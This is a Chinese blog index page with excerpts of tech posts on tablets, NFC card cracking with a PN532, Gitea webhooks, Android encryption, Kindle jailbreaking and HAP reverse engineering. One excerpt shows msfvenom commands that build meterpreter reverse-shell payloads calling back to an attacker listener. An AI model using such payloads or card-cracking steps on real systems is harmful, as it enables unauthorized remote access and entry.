主页

买前生产力,买后…gal?——小米平板 5 Pro 的“生产力”体验

背景 由于码代码的需要,本来是打算整一台笔电的,但同样的参数(不考虑CPU性能与可扩展性)下*米性价比拉满,再加上之前试过了用TermuxArch跑Arch大体够用,于是就入手了 检查 有没有第三方rec?如果没有,基本可以排除了(救砖需要,即使是“凑合能用”(比如我这台)也好过没有) 5G版?除了上网没有任何功能,我这种电话卡少的人并不认为有必要。 本人没有买笔,毕竟谁知道今年买的笔换了新款平板还能不能用呢🤣👉 如果真的需要实际应用在日常中,屏幕绝对是越大越好,像小米平板5Pro这种11寸是绝对不够的(但更大的适配rec的开发者更少) 开用 关于硬件 本人用的是罗技K580无线键盘(使用电池,全键)与英菲克A1无线鼠标的顶配版(有侧边返回键、Type-C充电口),购...

安卓使用 PN532 读写 NFC

动机 安卓手机本身的NFC功能不全且爆破密码太慢,于是买了个PN532破小区门卡。 Windows上有现成的工具MifareOneTool和教程,很轻松就解决了,于是想着能否在安卓的Termux上复现,于是就有了这篇文章。 准备 物质准备 PN532,我买的是这个的PN532+CH340G套餐 一台有OTG功能的安卓手机,安卓版本最低为7.0 自行焊接PN532的引脚 焊接完成后按下表接线,注意PN532上面有两个调节工作模式的开关(开关上覆膜),这里不需要调节。 PN532 USB转TTL模块 USB转TTL线(具体颜色不重要) GND GND ...

开始使用 Bootstrap

动机 由于非常想要一个像样的警告框,于是随便搞了个前端框架,仅作记录 demo Well done! Great! Here comes a link. Whenever you need to, be sure to use margin utilities to keep things nice and tidy. An example notice alert with an icon An example notice question with an icon An example danger alert with an icon An example error alert with an ico...

使用 Python 内置模块接收 Gitea Webhook 以自动更新

动机 由于完全没找到个像样的Webhook轮子和自动更新轮子,所以自己乱写了一个。单线程,但是it just works™ Gitea 以下假设你的生产服务器地址为192.168.33.44。 配置文件 Webhook 配置文件文档,包括对loopback等特殊取值的说明 跑Gitea的服务端要改一下custom/conf/app.ini,最后加上以下这一段内容,然后重启Gitea (loopback指的是跑Gitea的服务器自己,一般不建议添加) [webhook] ALLOWED_HOST_LIST = 192.168.33.44,loopback Webhook 设置 Webhook 配置文档 设置->Web 钩子->添加 We...

为 Metasploit 的后门内置 persistence

新版 重构后的项目位于Young-Lord/msf-remote-logger,直接用这个就可以了。(开源协议:AGPL-3.0) 前言 依旧是一篇名不副实的博文。说到底是跑了个Python监听服务器,然后自动处理连接过来的session。 代码很烂,但又不是不能用。基于WTFPL协议共享。 正文 # pip install tendo pymetasploit3 # msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.13.106 LPORT=7787 --platform Windows -f exe > b.exe # msfvenom -p windows/meterpreter/reve...

关闭 Android 文件系统强制加密

参考资料 如何为采用动态分区的高通设备禁用 data 分区强制加密 简单来说就是依次在/product, /vendor, /system分区下寻找etc/fstab.qcom文件,把,fileencryption=ice改成,encryptable=ice或者直接删掉,然后清除data分区。 修改后,还需要在Recovery内禁用AVB校验。 文中还提到了使用magiskboot hexpatch支持动态分区的设备的方法。

Kindle 越狱记录

背景 Kindle Voyage一直在吃灰,一年前刚好能越狱,就越了个狱并探索了一下。此处做一些记录。 越狱 这里就直接摆书伴的教程了,比较麻烦,全程可以使用手机OTG功能完成。 基础框架 JailBreak Hotfix,必须先装,防止越狱失效 MRPI, KUAL,插件管理器 在连接电脑后显示的根目录新建一个目录update.bin.tmp.partial,防止Kindle更新 插件 建议先把书伴的列表与NiLuJe的列表都看一遍,下面很多插件下载链接都在这里 大部分插件安装只需将文件夹放进extensions目录下即可,小部分以.bin结尾的,需要通过;log mrpi刷入,具体可以看书伴的教程 KOReader, KPVBooklet,极大增强的电子书阅读...

华为hap安装包逆向记录

背景 最近对华为智能手表(HarmonyOS 2)应用商店中的程序进行了提取、解包、修改以及修改包名后重新安装,而全程没有找到这方面的教程,故稍作记录。 本文全程未用到DevEco Studio,并且仅在Windows 10系统下尝试可行。理论上其它操作系统也可完成本文全部流程。 目标应用包名为com.company.victim,修改后的新包名为moe.person.attack 使用的工具(依赖) Java (JDK) Android SDK Platform-Tools Apktool smali/baksmali jadx-gui hapsigntoolv2.jar (GitHub) (Gitee) jarsigner(默认随JDK安装)...